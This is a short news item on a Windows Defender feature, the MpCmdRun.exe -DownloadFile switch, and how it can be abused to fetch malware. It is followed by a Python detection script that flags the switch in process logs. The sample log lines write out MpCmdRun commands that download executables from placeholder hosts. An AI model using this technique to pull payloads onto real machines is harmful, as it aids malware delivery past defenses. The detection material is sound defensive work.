Date: 2020-09-05

Microsoft Defender, the native antivirus for the Windows operating system, has just gained new functionality that, ironically, can be misused to download files infected with viruses. Obviously, downloading malware was not the goal the Redmond giant had in mind when designing the feature, but it only takes looking at it from a more malicious perspective to see that it can be abused.

Starting with build 4.18.2007.9, Defender has a new parameter in the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe), a command-line interface for controlling Defender through text commands. The parameter is -DownloadFile, which retrieves files from remote locations: the user simply supplies the source URL and the local destination.


Hence the problem: as noted by security researcher Mohammed Askar, this function can be exploited by a malicious actor, either with physical access to the computer or by commanding it remotely, to download malware. In tests, Askar was able to download the executable for WastedLocker, the well-known ransomware that was recently used to attack companies like Garmin.

Fortunately, there is no reason to despair: Microsoft Defender will detect whether the file in question is suspicious. Still, we don't know whether it will allow other security solutions to identify the nature of these files.
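For defenders, the download switch is visible in process-creation telemetry. The following is an added example, not code from the original article or from Microsoft: it parses command lines and reports any use of -DownloadFile, with the source and destination pulled out for triage. The `-url` and `-path` arguments are MpCmdRun.exe options not named in the article, and the sample command lines, hosts and paths are constructed.

```python
import shlex
from ntpath import basename          # Windows path rules on any OS
from urllib.parse import urlparse

# Constructed process-creation command lines (the kind recorded by Sysmon
# Event ID 1 or Security event 4688); hosts and paths are placeholders.
SAMPLE_EVENTS = [
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1',
    r'"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2007.9-0\MpCmdRun.exe" '
    r'-DownloadFile -url https://files.example.test/a.bin -path C:\Users\Public\a.bin',
    r'mpcmdrun.exe -downloadfile -URL "http://192.0.2.10/x.exe" -PATH "C:\Temp\x y.exe"',
    r'C:\Temp\helper.exe -DownloadFile -url http://example.test/z -path C:\Temp\z',
]

def parse_download(cmdline):
    """Return a finding for a -DownloadFile invocation, or None."""
    try:
        # posix=False leaves backslashes alone and keeps quoted paths whole.
        raw = shlex.split(cmdline, posix=False)
    except ValueError:               # unbalanced quote: plain whitespace split
        raw = cmdline.split()
    tokens = [t.strip('"') for t in raw]
    flags = [t.lower() for t in tokens]   # switches are matched case-insensitively
    if "-downloadfile" not in flags:
        return None

    def value_of(flag):
        # The value is the token that follows the flag, if there is one.
        i = flags.index(flag) if flag in flags else -1
        return tokens[i + 1] if 0 <= i < len(tokens) - 1 else None

    url = value_of("-url")
    image = basename(tokens[0])
    return {
        "image": image,
        # False: a differently named binary used the same switch (possibly a
        # renamed copy), which deserves a closer look rather than dismissal.
        "image_is_mpcmdrun": image.lower() == "mpcmdrun.exe",
        "url": url,
        "host": urlparse(url).hostname if url else None,
        "path": value_of("-path"),
    }

def scan(events):
    """Findings for every event that uses the download switch."""
    return [f for f in map(parse_download, events) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Because Defender's own updates do not need an operator to type this switch, any hit is worth correlating with the parent process and the account that launched it.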

Source: BleepingComputer